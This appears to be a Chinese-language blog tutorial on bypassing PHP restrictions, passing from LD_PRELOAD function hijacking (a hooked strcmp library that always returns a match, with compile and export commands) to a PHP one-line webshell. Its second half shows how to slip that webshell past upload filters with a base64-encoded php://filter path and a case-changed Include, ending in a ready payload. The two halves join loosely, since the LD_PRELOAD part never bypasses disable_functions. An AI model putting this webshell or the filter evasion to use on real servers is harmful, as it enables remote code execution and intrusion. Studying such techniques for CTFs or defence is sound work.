通过LD_PRELOAD绕过disable_functions

LD_PRELOAD

在UNIX的动态链接库的世界中,LD_PRELOAD就是这样一个环境变量,它可以影响程序的运行时的链接(Runtime

linker),它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。一方面,我们可以以此功能来使用自己的或是更好的函数(无需别人的源码),而另一方面,我们也可以以向别人的程序注入恶意程序,从而达到那不可告人的罪恶的目的。

具体的操作步骤如下:

1.定义一个函数,函数的名称、变量及变量类型、返回值及返回值类型都要与要替换的函数完全一致。这就要求我们在写动态链接库之前要先去翻看一下对应手册等。

2.将所写的 c 文件编译为动态链接库。

3.对 LD_PRELOAD 及逆行设置,值为库文件路径,接下来就可以实现对目标函数原功能的劫持了

结束攻击,使用命令 unset LD_PRELOAD 即可

whoami.c

#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) {
char name[] = "mon";
if (argc < 2) {
printf("usage: %s <given-name>\n", argv[0]);
return 0;
}
if (!strcmp(name, argv[1])) {
printf("\033[0;32;32mYour name Correct!\n\033[m");
return 1;
} else {
printf("\033[0;32;31mYour name Wrong!\n\033[m");
return 0;
}
}

接下来写一个动态链接库,目标函数为这里进行判断的 strcmp 函数

hook_strcmp.c

#include <stdlib.h>

#include <string.h>

int strcmp(const char *s1, const char *s2) {

if (getenv("LD_PRELOAD") == NULL) {

return 0;

}

unsetenv("LD_PRELOAD");

return 0;

}

由于我们通过 LD_PRELOAD 劫持了函数,劫持后启动了一个新进程,若不在新进程启动前取消 LD_PRELOAD,则将陷入无限循环,所以必须得删除环境变量 LD_PRELOAD,最直接的就是调用 unsetenv("LD_PRELOAD")

然后进行编译,并且通过hook_strcmp.c 生成一个动态链接文件如下代码:

root@kunkun-virtual-machine:~# gcc -shared -fPIC hook_strcmp.c -o hook_strcmp.so

gcc -o whoami whoami.c

测试

root@kunkun-virtual-machine:~# ./whoami aaa

You Name Wrong!

我们再加载一下环境变量,加载了环境变量后就意味着我们劫持成功了,

export LD_PRELOAD=$PWD/hook_strcmp.so

root@kunkun-virtual-machine:~# ./whoami aaa

You Name Correct

绕过过滤

直接写一句话后门

<?php eval($_POST[1]); ?>

然后上传成功,拿到文件名

但是想要执行,反引号被ban了

那就用到php://filter解码一句话后门,然后再结合include:

php://filter/read=convert.base64-decode/resource=可以让后面的内容以php文件执行

include可以让php文件自动执行

那么就可以写成

<?php Includ("php://filter/read=convert.base64-decode/resource=5032242ac3f2c4552f7026dd956f4113.php"); ?>

思路就是利用伪协议让后门可执行,然后利用include自动执行

问题1.include被过滤了

php函数不区分大小写,所以改成Include即可

问题2.伪协议被过滤了

将php://filter/read=convert.base64-decode/resource=5032242ac3f2c4552f7026dd956f4113.php

整个进行base64编码即可

最后payload为:

<?php Include(base64_decode("cGhwOi8vZmlsdGVyL3JlYWQ9Y29udmVydC5iYXNlNjQtZGVjb2RlL3Jlc291cmNlPTUwMzIyNDJhYzNmMmM0NTUyZjcwMjZkZDk1NmY0MTEzLnBocA==")); ?>

相关推荐
山河君1 分钟前
ubuntu使用DeepSpeech进行语音识别(包含交叉编译)
linux·ubuntu·语音识别
鹏大师运维5 分钟前
【功能介绍】信创终端系统上各WPS版本的授权差异
linux·wps·授权·麒麟·国产操作系统·1024程序员节·统信uos
筱源源7 分钟前
Elasticsearch-linux环境部署
linux·elasticsearch
萨格拉斯救世主10 分钟前
jenkins使用slave节点进行node打包报错问题处理
运维·jenkins
川石课堂软件测试21 分钟前
性能测试|docker容器下搭建JMeter+Grafana+Influxdb监控可视化平台
运维·javascript·深度学习·jmeter·docker·容器·grafana
龙哥说跨境29 分钟前
如何利用指纹浏览器爬虫绕过Cloudflare的防护?
服务器·网络·python·网络爬虫
pk_xz1234562 小时前
Shell 脚本中变量和字符串的入门介绍
linux·运维·服务器
小珑也要变强2 小时前
Linux之sed命令详解
linux·运维·服务器
海绵波波1072 小时前
Webserver(4.3)TCP通信实现
服务器·网络·tcp/ip
九河云4 小时前
AWS账号注册费用详解:新用户是否需要付费?
服务器·云计算·aws